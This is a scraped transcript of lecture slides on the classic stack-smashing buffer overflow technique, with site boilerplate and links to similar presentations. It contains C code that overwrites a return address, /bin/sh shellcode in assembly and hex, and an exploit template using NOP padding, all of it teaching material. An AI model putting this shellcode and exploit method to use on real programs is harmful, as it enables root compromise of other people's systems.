Presentation is loading. Please wait.

Presentation is loading. Please wait.

Smashing the Stack for Fun and Profit

Published bySteven Keys Modified over 9 years ago

Similar presentations

Presentation on theme: "Smashing the Stack for Fun and Profit"— Presentation transcript:

1 Smashing the Stack for Fun and Profit
Review: Process memory organization The problem: Buffer overflows How to exploit the problem Implementing the Exploit Results Conclusion and discussion

2 Process Memory Organization

3 Process Memory Organization

4 Process Memory Organization

5 Function Calls

6 Function Calls

7 Buffer Overflows void function(char *str) { char buffer[8];
strcpy(buffer,str); } void main() { char large_string[256]; int i; for( i = 0; i < 255; i++) large_string[i] = 'A'; function(large_string); }

8 Buffer Overflows

9 Buffer Overflows

10 Buffer Overflows

11 Buffer Overflows

12 Buffer Overflows

13 Buffer Overflows

14 Buffer Overflows

15 Buffer Overflows

16 Modifying the Execution Flow
void function() { char buffer1[4]; int *ret; ret = buffer1 + 8; (*ret) += 8; } void main() { int x = 0; function(); x = 1; printf("%d\n",x); }

17 Modifying the Execution Flow

18 Modifying the Execution Flow

19 Modifying the Execution Flow

20 Modifying the Execution Flow

21 Exploiting Overflows- Smashing the Stack
Now we can modify the flow of execution- what do we want to do now? Spawn a shell and issue commands from it

22 Exploiting Overflows- Smashing the Stack
Now we can modify the flow of execution- what do we want to do now? Spawn a shell and issue commands from it

23 Exploiting Overflows- Smashing the Stack
What if there is no code to spawn a shell in the program we are exploiting? Place the code in the buffer we are overflowing, and set the return address to point back to the buffer!

24 Exploiting Overflows- Smashing the Stack
What if there is no code to spawn a shell in the program we are exploiting? Place the code in the buffer we are overflowing, and set the return address to point back to the buffer!

25 Implementing the Exploit
Writing and testing the code to spawn a shell Putting it all together- an example of smashing the stack Exploiting a real target program

26 Spawning a Shell #include <stdio.h> #include <stdlib.h>
void main() { GDB char *name[2]; ASSEMBLY CODE name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); exit(0); }

27 Spawning a Shell void main() {__asm__(" jmp 0x2a popl %esi
movl %esi,0x8(%esi) movb $0x0,0x7(%esi) movl $0x0,0xc(%esi) movl $0xb,%eax GDB movl %esi,%ebx BINARY CODE leal 0x8(%esi),%ecx leal 0xc(%esi),%edx int $0x80 movl $0x1, %eax movl $0x0, %ebx call -0x2f .string \"/bin/sh\" "); }

28 Spawning a Shell char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; This is just a array, but not a real string. O/w the \x00 will always marks the termination of the string.

29 Testing the Shellcode char shellcode[ ] = "\xeb\x2a\x5e…/bin/sh";
void main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; } In this example, we simply point the return address to the shell code char array, instead of using any string operation.

30 Testing the Shellcode

31 Testing the Shellcode

32 Putting it all Together
char shellcode[]="\xeb\x1f\…. \xb0\x0b\xff/bin/sh"; char large_string[128]; void main() { char buffer[96]; int i; long *long_ptr = (long *) large_string; for (i = 0; i < 32; i++) *(long_ptr + i) = (int) buffer; for (i = 0; i < strlen(shellcode); i++) large_string[i] = shellcode[i]; strcpy(buffer,large_string); }

33 Putting it all Together
b/c we cannot write the buffer address into the large_string directly. So we use long_ptr to write them indirectly.

34 Putting it all Together

35 Putting it all Together

36 Putting it all Together

37 Putting it all Together

38 Putting it all Together
Use 8 words (128-96=32 B) to overwrite b/c often we don’t know exactly where the ret address is, due to the variety of different machines/OSes. More advanced examples are available to find the stack pointer and thus more accurate overflow.

39 Exploiting a Real Program
It’s easy to execute our attack when we have the source code What about when we don’t? How will we know what our return address should be?

40 How to find Shellcode Guess - time consuming
- being wrong by 1 byte will lead to segmentation fault or invalid instruction

41 How to find Shellcode 2. Pad shellcode with NOP’s then guess
- we don’t need to be exactly on - much more efficient

42 Summary ‘Smashing the stack’ works by injecting code into a program using a buffer overflow, and getting the program to jump to that code By exploiting a root program, user can call exec(“/bin/shell”) and gain root access

43 Summary Buffer overflow vulnerabilities are the most commonly exploited- account for more than half of all new security problems (CERT) Are relatively easy to exploit Many variations on stack smash- heap overflows, internet attacks, etc.

44 Small Buffer Overflows
If the buffer is smaller than our shellcode, we will overwrite the return address with instructions instead of the address of our code Solution: place shellcode in an environment variable then overflow the buffer with the address of this variable in memory Can make environment variable as large as you want Only works if you have access to environment variables

45 Results: Hacking xterm
Attempts Without NOP padding - With NOP padding 10 Using environment variable 1

Download ppt "Smashing the Stack for Fun and Profit"

Similar presentations

Buffer Overflows Nick Feamster CS 6262 Spring 2009 (credit to Vitaly S. from UT for slides)

Buffer Overflows Nick Feamster CS 6262 Spring 2009 (credit to Vitaly S. from UT for slides)
Recitation 4 Outline Buffer overflow –Practical skills for Lab 3 Code optimization –Strength reduction –Common sub-expression –Loop unrolling Reminders.

Recitation 4 Outline Buffer overflow –Practical skills for Lab 3 Code optimization –Strength reduction –Common sub-expression –Loop unrolling Reminders.
Hacking: The Art of Exploitation

Hacking: The Art of Exploitation
Exploring Security Vulnerabilities by Exploiting Buffer Overflow using the MIPS ISA Andrew T. Phillips Jack S. E. Tan Department of Computer Science University.

Exploring Security Vulnerabilities by Exploiting Buffer Overflow using the MIPS ISA Andrew T. Phillips Jack S. E. Tan Department of Computer Science University.
Introduction to Information Security ROP – Recitation 5 nirkrako at post.tau.ac.il itamarg at post.tau.ac.il.

Introduction to Information Security ROP – Recitation 5 nirkrako at post.tau.ac.il itamarg at post.tau.ac.il.
Exploits Buffer Overflows and Format String Attacks David Brumley Carnegie Mellon University.

Exploits Buffer Overflows and Format String Attacks David Brumley Carnegie Mellon University.
Buffer Overflows By Tim Peterson Joel Miller Dan Block.

Buffer Overflows By Tim Peterson Joel Miller Dan Block.
Beyond Stack Smashing: Recent Advances in Exploiting Buffer Overruns Jonathan Pincus Microsoft Research Brandon Baker Microsoft Carl Hartung CSCI 7143:

Beyond Stack Smashing: Recent Advances in Exploiting Buffer Overruns Jonathan Pincus Microsoft Research Brandon Baker Microsoft Carl Hartung CSCI 7143:
Foundations of Network and Computer Security J J ohn Black Lecture #29 Nov 12 th 2007 CSCI 6268/TLEN 5831, Fall 2007.

Foundations of Network and Computer Security J J ohn Black Lecture #29 Nov 12 th 2007 CSCI 6268/TLEN 5831, Fall 2007.
Buffer Overflow. Process Memory Organization.

Buffer Overflow. Process Memory Organization.
Foundations of Network and Computer Security J J ohn Black Lecture #17 Oct 26 th 2004 CSCI 6268/TLEN 5831, Fall 2004.

Foundations of Network and Computer Security J J ohn Black Lecture #17 Oct 26 th 2004 CSCI 6268/TLEN 5831, Fall 2004.
Foundations of Network and Computer Security J J ohn Black Lecture #19 Nov 3 rd 2005 CSCI 6268/TLEN 5831, Fall 2005.

Foundations of Network and Computer Security J J ohn Black Lecture #19 Nov 3 rd 2005 CSCI 6268/TLEN 5831, Fall 2005.
Foundations of Network and Computer Security J J ohn Black Lecture #30 Nov 13 th 2009 CSCI 6268/TLEN 5550, Fall 2009.

Foundations of Network and Computer Security J J ohn Black Lecture #30 Nov 13 th 2009 CSCI 6268/TLEN 5550, Fall 2009.
September 22, 2014 Pengju (Jimmy) Jin Section E

September 22, 2014 Pengju (Jimmy) Jin Section E
Attacks Using Stack Buffer Overflow Boxuan Gu

Attacks Using Stack Buffer Overflow Boxuan Gu
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-

Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.

CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.
Lecture 6: Buffer Overflow CS 436/636/736 Spring 2014 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)

Lecture 6: Buffer Overflow CS 436/636/736 Spring 2014 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)
Exploiting Buffer Overflows on AIX/PowerPC HP-UX/PA-RISC Solaris/SPARC.

Exploiting Buffer Overflows on AIX/PowerPC HP-UX/PA-RISC Solaris/SPARC.
Buffer Overflow Computer Organization II 1 ©2005-2013 McQuain Buffer Overflows Many of the following slides are based on those from Complete Powerpoint.

Buffer Overflow Computer Organization II 1 © McQuain Buffer Overflows Many of the following slides are based on those from Complete Powerpoint.

Similar presentations

Ads by Google